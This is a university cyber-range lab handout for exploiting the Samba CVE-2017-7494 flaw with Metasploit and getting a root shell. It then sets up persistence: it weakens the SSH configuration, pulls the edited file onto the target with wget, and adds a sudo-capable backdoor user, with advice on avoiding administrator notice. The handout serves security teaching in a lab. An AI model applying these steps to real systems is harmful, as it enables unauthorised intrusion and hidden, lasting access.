LAB_Exploitation
LAB_Exploitation
LAB_Exploitation
1. Overview
This exercise will demonstrate the use of various Tools, Techniques, and Procedures to complete the exploitation of a
target host based on a known vulnerability. I have highlighted all the commands, be sure to check for spelling or syntax
errors if the command fails. I have also included points in which you should insert screenshots of your output. I will be
using these screenshots for grading.
2. Resources required
This exercise uses the latest Cyber Range: Cyber Basics Environment.
3. Tasks
PART 1: Exploitation
Task 1: Logon to Kali Linux
Start and join the Cyber Basics Environment. If you are asked to log in, use the username: student and password:
student.
After looking at all the data gathered during the Enumeration and Vulnerability Scanning exercises, the best vulnerability
to use for an exploit is the SMB vulnerability CVE-2017-7494.
Examine the details of the Common Vulnerabilities and Exposures (CVE) at the following link:
https://www.cvedetails.com/cve/CVE-2017-7494/?q=CVE-2017-7494
From the left pane of the page, click on (1 Metasploit modules) to find information about the Metasploit Module.
©2024 Virginia Cyber Range. Created by Matthew Vogel. (CC BY-NC-SA 4.0)
1
ITN263
Term: Fall 2024
Now that we have identified a vulnerability to exploit and know the Metasploit module name, it is time to get serious.
Metasploit is a penetration testing framework that comes installed in Kali Linux. Metasploit commands are run from the
command line.
First, you need to start Metasploit Framework Console (msfconsole). There are several steps to properly starting the
msfconsole.
First, you need to start the postgresql database service. Metasploit uses this database to store information gathered via
penetration testing activities. You will need to use the sudo command to run this command. The sudo command runs a
command with root-level privileges.
Second, you must initialize the msf database using the msfdb init command as follows.
Finally, you can start the Metasploit Framework Console by using the msfconsole command as follows:
msfconsole
The msfconsole will start and give you the msf> prompt once the startup has been completed. While you are in the
msfconsole, regular Linux commands will no longer work.
To see a list of available commands from the msf> prompt, type a ? and press enter.
©2024 Virginia Cyber Range. Created by Matthew Vogel. (CC BY-NC-SA 4.0)
2
ITN263
Term: Fall 2024
The first command you will use is the search command which will allow you to look for information on the Metasploit
exploit that you will use for this penetration test.
You can search for a CVE number or a Metasploit module name. Use the search command to look for the Metasploit
module that corresponds to the vulnerability we discovered using both the CVE number cve-2017-7494 and the name
is_known_pipename using the following commands from the msf> prompt:
search cve-2017-7494
©2024 Virginia Cyber Range. Created by Matthew Vogel. (CC BY-NC-SA 4.0)
3
ITN263
Term: Fall 2024
search is_known_pipename
©2024 Virginia Cyber Range. Created by Matthew Vogel. (CC BY-NC-SA 4.0)
4
ITN263
Term: Fall 2024
As you can see from the examples above, both methods of search produce the same results. The search command
shows there is an exploit, the location of the exploit, the disclosure date, the rank, and the description of the exploit.
You can now use this information to exploit the target.
Next, you will use the use command to load the exploit as follows:
use exploit/linux/samba/is_known_pipename
When using the use command, you have to use the full path as shown in the name column of the search results as in the
examples above.
The prompt will change to show the name of the exploit that was loaded. Now use the options command to see the
options for the exploit as follows:
options
©2024 Virginia Cyber Range. Created by Matthew Vogel. (CC BY-NC-SA 4.0)
5
ITN263
Term: Fall 2024
If you look at the options list in the example above, the first option RHOST is blank and is required. RHOST stands for
Remote Host and is the IP address of the target system. Whenever you are attempting to exploit a target system, you
always have to provide an RHOST.
You can use the set command to set the RHOST option using the following command below. The target_ip is the IP
address of the target system identified in previous exercises. The target IP is the host we used in our last enumeration
lab. To find that address open a new terminal window and follow these steps:
route
nmap network_IP/20 (use the network you found with the route command)
Find the host with all the open ports, record IP Address here:
192.168.0.11****
©2024 Virginia Cyber Range. Created by Matthew Vogel. (CC BY-NC-SA 4.0)
6
ITN263
Term: Fall 2024
Once the RHOST option is set, you can then use the exploit command to launch the exploit. If the exploit fails the first
time, check to make sure the target IP address (RHOST) is correct using the options command and run the exploit again.
If the exploit succeeds, you will get Command shell session 1 opened message. This means you have successfully
executed the exploit against the target system.
©2024 Virginia Cyber Range. Created by Matthew Vogel. (CC BY-NC-SA 4.0)
7
ITN263
Term: Fall 2024
Insert a screenshot of your output, it will be similar to the image below but with your specific IP
information:
[NOTE: In the sample above, the target IP address is: 10.1.68.250 The IP address of the target host in your network may
be different.]
After the Command shell session 1 opened, you will just have a blinking cursor and no indication that you have entered
a shell on the target system. Use the whoami command to see what account you are logged in to in the shell on the
target system as follows:
whoami
You should see that you are the root user. Success!
You can also use the hostname command to see the target system hostname, the pwd command to see the current
directory that you are in on the target system, and the ip addr command to see the IP address of the target system.
The basic shell is a little difficult to work with as it gives you no prompt and no feedback if the command you execute
fails. You can get a more usable shell by using a Python script. Use the following command to create a more useful shell
on the target system:
©2024 Virginia Cyber Range. Created by Matthew Vogel. (CC BY-NC-SA 4.0)
8
ITN263
Term: Fall 2024
This command uses the Python programming language to create a new bash shell. Bash is the default shell used in
Linux.
5. References
https://metasploit.help.rapid7.com/docs
PART 2: Post-Exploitation
Task 1: Copy the SSH server configuration from the target system
If you remember back to the enumeration phase, there is an SSH server running on the target system but it requires
cryptographic keys to log on. Since you are now the root user and have a shell on the target system, you can modify the
SSH server configuration so that you can log on with just a username and password. This will allow you to access the
system without having to exploit the vulnerability every time.
Editing the SSH server configuration file via the current shell is possible but difficult. An easier way to modify the SSH
server configuration is to copy the /etc/ssh/sshd_config file to the Kali Linux system, edit the file, and then put it back
on the target system.
On the target system via your msfconsole shell, change to the /etc/ssh/ directory using the cd command as follows:
cd /etc/ssh/
cat sshd_config
On your Kali Linux system, open a new terminal window and create a new directory name sshd in the student home
directory as shown below. This directory will be used to hold the sshd config file that you copy from the target system.
The ~/ in the following command means the home directory of the current user:
©2024 Virginia Cyber Range. Created by Matthew Vogel. (CC BY-NC-SA 4.0)
9
ITN263
Term: Fall 2024
mkdir ~/sshd
On your Kali Linux system, open a text editor named Mousepad by going to Applications in the top left-hand corner of
the desktop, type Mousepad into the search bar, and select Mousepad from the list of apps.
Copy and paste the sshd_config file from the shell on the target system into the text editor on your Kali Linux system.
Make sure you get the entire file starting with line # $OpenBSD: sshd_config and going to the last line # ForceCommand
cvs server. When copying the text from a terminal window, you have to highlight the text and then select Edit and Copy
from the menu at the top of the terminal window.
©2024 Virginia Cyber Range. Created by Matthew Vogel. (CC BY-NC-SA 4.0)
10
ITN263
Term: Fall 2024
You can now paste the copied text into the Mousepad application.
©2024 Virginia Cyber Range. Created by Matthew Vogel. (CC BY-NC-SA 4.0)
11
ITN263
Term: Fall 2024
Edit the sshd_config file in the Mousepad application to allow password authentication and interactive password
request/response.
PasswordAuthentication no
TO
PasswordAuthentication yes
ChallengeResponseAuthentication no
TO
ChallengeResponseAuthentication yes
Save the file and name it sshd_config and place it in the sshd folder you just created on your Kali Linux system. When
you select File and Save in the Mousepad application, the default location will be the student home folder. You will
have to select the sshd folder.
On the Kali Linux system in a terminal window, change to the new sshd directory you created as follows:
cd ~/sshd
On the Kali Linux system, use the ls command to verify the sshd_config file is present.
©2024 Virginia Cyber Range. Created by Matthew Vogel. (CC BY-NC-SA 4.0)
12
ITN263
Term: Fall 2024
Now you have to get the file back to the target system, but you cannot copy and paste it back to the target system.
Luckily there is a way to use Python to put the file back. Python has a script that can start a simple HTTP web server in
any directory on a Linux system. The SimpleHTTPServer script will serve up a webpage and make the files located in the
directory where the server was started accessible via HTTP. You can then download any files located in the directory
where the SimpleHTTPServer is running.
Make sure you are in the sshd directory on your Kali Linux system as follows:
cd ~/sshd
Start the SimpleHTTPServer on port 8000 on your Kali Linux system using the command shown below. Web servers
normally use port 80; however, it is recommended you use a different port to avoid any port conflicts with any other
service that may be running on your Kali Linux system. The -m option tells python to run a module which in this case is
SimpleHTTPServer. Kali Linux has both Python version 2 and version 3 installed. SimpleHTTPServer is a Python2 module,
so we will use that Python version here.
Test the SimpleHTTPServer with a web browser in Kali Linux by going to http://127.0.0.1:8000. Verify that the
sshd_config file is listed on the webpage. The 127.0.0.1 IP address is the loopback address for your Kali Linux system.
On the target system via your msfconsole shell, change to the /etc/ssh directory as follows:
cd /etc/ssh
On the target system via your msfconsole shell, move the current sshd_config file to sshd_config_old to make way for
the newly edited file. You should always rename files when replacing them so you can revert to the original file by just
©2024 Virginia Cyber Range. Created by Matthew Vogel. (CC BY-NC-SA 4.0)
13
ITN263
Term: Fall 2024
changing the name back. If you overwrite the file, it will be gone for good. To rename a file in Linux, you use the mv
command which stands for move.
mv sshd_config sshd_config_old
On the target system via your msfconsole shell, use the wget command to get the new sshd_config file from your Kali
Linux system via HTTP. If you do not know the IP address of your Kali Linux system, use the ip addr command to find the
IP address. Be sure to replace kali_linux_ip with the IP address of your Kali Linux system. Wget is a command line HTTP
client that can download files from an HTTP server.
wget kali_linux_ip:8000/sshd_config
On the target system via your msfconsole shell, use the ls command to verify that the sshd_config file has been
downloaded as follows:
ls sshd_config
Now that you have the new and improved sshd_config file in place, you need to restart the sshd service on the target
system via your msfconsole shell as follows:
Now the SSH server on the victim system should allow a username and password.
The question now is which username and password you should use to log in. You have root-level access but do not
know the root password and do not want to change the root password. Changing the root password may alert system
administrators when the root password no longer works for them.
©2024 Virginia Cyber Range. Created by Matthew Vogel. (CC BY-NC-SA 4.0)
14
ITN263
Term: Fall 2024
On the target system via your msfconsole shell, use the adduser command as follows to add a new user to the victim
system and set the password using the password command. In the example below, the username is yourname, be sure
to put your actual first name instead of ‘yourname’.
adduser yourname
passwd sekret
You will also need to add the new user to the sudo group with the usermod command so the user can execute
commands as root as follows:
On the Kali Linux system in a terminal window, CTRL + C to return to the prompt and use the new account you created
on the target system to SSH into the target system from your Kali system. You will need to use the password you set for
the new user. Be sure to replace target_system_ip with the IP address of your target system.
ssh yourname@target_system_ip
On the target system via your SSH shell, test to make sure the sudo access is working for the new account as follows:
cd ~
sudo echo test > testfile
ls testfile
You should see a file named testfile if your use of sudo was successful.
You are now able to access the target system at will without having to exploit the vulnerability. Even if the vulnerability
is patched, you will have access to the target system with your new user account via SSH.
5. References
https://metasploit.help.rapid7.com/docs
https://www.kali.org/kali-linux-documentation/
https://www.ssh.com/ssh/command/
©2024 Virginia Cyber Range. Created by Matthew Vogel. (CC BY-NC-SA 4.0)
15
ITN263
Term: Fall 2024
This exercise is designed to use the latest Cyber Range Cyber Basics Environment. All students will have to register for
an account to access the Cyber Range. The instructor will have to create a class and add the Cyber Basics Environment
for the students to be able to use.
The grading for this exercise is based on the output provided by the students. Each student’s environment will be a little
different so there is no master answer key. Students should be encouraged to document their work via a Penetration
Testing Log which they can turn in for grading. The log can be done in any word processing application and should
contain a list of tasks completed, commands run for each task, screenshots of the output from each task, and any issues
encountered during the exercise. The instructor should review the log to ensure that the students are mastering the
appropriate skills.
For this exercise, the students should document all of the steps that they took to gain persistent access to the target
system and any issues they encountered.
©2024 Virginia Cyber Range. Created by Matthew Vogel. (CC BY-NC-SA 4.0)
16